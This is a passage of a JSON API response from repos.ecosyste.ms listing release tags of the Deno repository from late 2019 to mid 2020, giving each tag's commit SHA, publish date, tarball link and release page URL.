https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.58.0/manifests"},{"name":"v1.1.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.1.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.1.0/manifests"},{"name":"std/0.57.0","sha":"7d41bacfba6a3557066345ecd282f0d83e4a4381","kind":"commit","published_at":"2020-06-12T16:43:09.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.57.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.57.0/manifests"},{"name":"v1.0.5","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.5/manifests"},{"name":"std/0.56.0","sha":"515d19d901e7e5dbc04670807a2bd1cea237e9e8","kind":"commit","published_at":"2020-06-03T16:52:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.56.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.56.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.56.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.56.0/manifests"},{"name":"v1.0.4","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.4/manifests"},{"name":"std/0.55.0","sha":"9c59a4b18c0aac3699d210c1f05f152651ddca28","kind":"commit","published_at":"2020-06-02T13:48:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.55.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.55.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.55.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.55.0/manifests"},{"name":"v1.0.3","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.3/manifests"},{"name":"std/0.54.0","sha":"106b00173806e088472e123d04fdc8d260c3820d","kind":"commit","published_at":"2020-05-29T16:48:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.54.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.54.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.54.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.54.0/manifests"},{"name":"std/0.53.0","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.53.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.53.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.53.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.53.0/manifests"},{"name":"v1.0.2","sha":"526c9196e23af34d1ecd424d09c99c7003c33844","kind":"commit","published_at":"2020-05-22T18:00:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.2/manifests"},{"name":"v1.0.1","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.1/manifests"},{"name":"std/0.52.0","sha":"49dda23f6b936f21de2a3de4be39771f30ddd6e9","kind":"commit","published_at":"2020-05-20T16:40:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.52.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.52.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.52.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.52.0/manifests"},{"name":"std/0.51.0","sha":"c474d383543708fc636c06dd2e4a9100495f45c5","kind":"commit","published_at":"2020-05-14T11:45:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.51.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.51.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.51.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.51.0/manifests"},{"name":"v1.0.0","sha":"55d2c6bd103879263c115fa5697f3cf3101158f4","kind":"commit","published_at":"2020-05-13T22:07:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc3","sha":"35e8bc8de65b523e082d446dc25f114ed81264a8","kind":"commit","published_at":"2020-05-12T12:33:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc3","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"d8f5b37218715bbc624eb53dd4b7409867b2c803","kind":"commit","published_at":"2020-05-09T19:37:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc2","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc2/manifests"},{"name":"std/0.50.0","sha":"d5dd5ae87d7598643a46f27fa4a11b2a85d42be8","kind":"commit","published_at":"2020-05-09T13:15:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.50.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.50.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.50.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.50.0/manifests"},{"name":"v1.0.0-rc1","sha":"5f67a202ff59f25ea183c261f664a6db06407e17","kind":"commit","published_at":"2020-05-04T19:46:39.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.0.0-rc1","html_url":"https://github.com/denoland/deno/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.0.0-rc1/manifests"},{"name":"v0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.42.0/manifests"},{"name":"std/0.42.0","sha":"f92bb9cf4de6ed4b6a84a14775e0dbe4ed45291a","kind":"commit","published_at":"2020-04-29T21:04:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.42.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.42.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.42.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.42.0/manifests"},{"name":"v0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.41.0/manifests"},{"name":"std/0.41.0","sha":"00fa4858b071739c76965e3c9ae096f2084d701b","kind":"commit","published_at":"2020-04-16T14:47:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.41.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.41.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.41.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.41.0/manifests"},{"name":"v0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.40.0/manifests"},{"name":"std/0.40.0","sha":"0cf4ac91e6917b76c00d3d4b790e9fefc4dc5323","kind":"commit","published_at":"2020-04-08T18:59:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.40.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.40.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.40.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.40.0/manifests"},{"name":"v0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.39.0/manifests"},{"name":"std/0.39.0","sha":"cb0acfe305a0f2f13773f41a038d8a919c3730ae","kind":"commit","published_at":"2020-04-03T18:38:56.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.39.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.39.0/manifests"},{"name":"v0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.38.0/manifests"},{"name":"std/0.38.0","sha":"d6cb3892d48209fdb9c5196bb444e33a82bd3724","kind":"commit","published_at":"2020-03-28T19:26:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.38.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.38.0/manifests"},{"name":"v0.37.1","sha":"b924e5ab7e69eab4d3b6d9a863a8fc2974f33b5d","kind":"commit","published_at":"2020-03-23T21:14:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.1/manifests"},{"name":"v0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.37.0/manifests"},{"name":"std/0.37.0","sha":"d143fe61bc61030c0874c091aa0dd8bf5141b5fa","kind":"commit","published_at":"2020-03-23T16:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.37.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.37.0/manifests"},{"name":"v0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.36.0/manifests"},{"name":"std/0.36.0","sha":"3ed6ccc905394ed9c5d9cbcb8fa2426151780788","kind":"commit","published_at":"2020-03-11T23:13:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.36.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.36.0/manifests"},{"name":"v0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.35.0/manifests"},{"name":"std/0.35.0","sha":"a29343c7d6b5dad26c5d501eb6d21e9caf382a58","kind":"commit","published_at":"2020-02-29T04:49:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.35.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.35.0/manifests"},{"name":"v0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.34.0/manifests"},{"name":"std/0.34.0","sha":"a0d3b4ebc509d9e5dfca555084fd1100e114664a","kind":"commit","published_at":"2020-02-20T15:57:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/std/0.34.0","html_url":"https://github.com/denoland/deno/releases/tag/std/0.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@std%2F0.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/std%2F0.34.0/manifests"},{"name":"v0.33.0","sha":"87c329c45ac0e3382c115793094317df15cbe5bf","kind":"commit","published_at":"2020-02-13T22:45:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.33.0/manifests"},{"name":"v0.32.0","sha":"f4cc08c4fc97f86d82b860ac11a134dad75dfdca","kind":"commit","published_at":"2020-02-03T15:36:07.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.32.0/manifests"},{"name":"v0.31.0","sha":"8bc639a23e141d350e35ea112a4a9be2ea536fe6","kind":"commit","published_at":"2020-01-24T16:07:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.31.0/manifests"},{"name":"v0.30.1","sha":"7fd50065a7d8a4c6ed1b1090703a7baaabdbd6aa","kind":"commit","published_at":"2020-01-21T17:44:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.1/manifests"},{"name":"v0.30.0","sha":"b2f01dcb50c68da2cab28b6bd64f4033e4ccf10e","kind":"commit","published_at":"2020-01-18T12:58:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.30.0/manifests"},{"name":"v0.29.0","sha":"525784e5642cbd869c682a0fda595f55c785d607","kind":"commit","published_at":"2020-01-09T18:42:24.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.29.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.29.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.29.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.29.0/manifests"},{"name":"v0.28.1","sha":"a61966a243cd5d09031fabd9a572a75aab8d2da8","kind":"commit","published_at":"2020-01-03T14:04:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.1/manifests"},{"name":"v0.28.0","sha":"328fef9cd6aa0ab3033380cabdf91b9779db5054","kind":"commit","published_at":"2020-01-02T13:41:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.28.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.28.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.28.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.28.0/manifests"},{"name":"v0.27.0","sha":"fcae4a7c0dc74701f3b1919bfd76cfdc1a0321ed","kind":"commit","published_at":"2019-12-18T23:48:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.27.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.27.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.27.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.27.0/manifests"},{"name":"v0.26.0","sha":"0ce9011edc8ec53df47e3103ecca3069d385ce37","kind":"commit","published_at":"2019-12-06T02:41:16.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.26.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.26.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.26.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0","manifests_url":"https://repo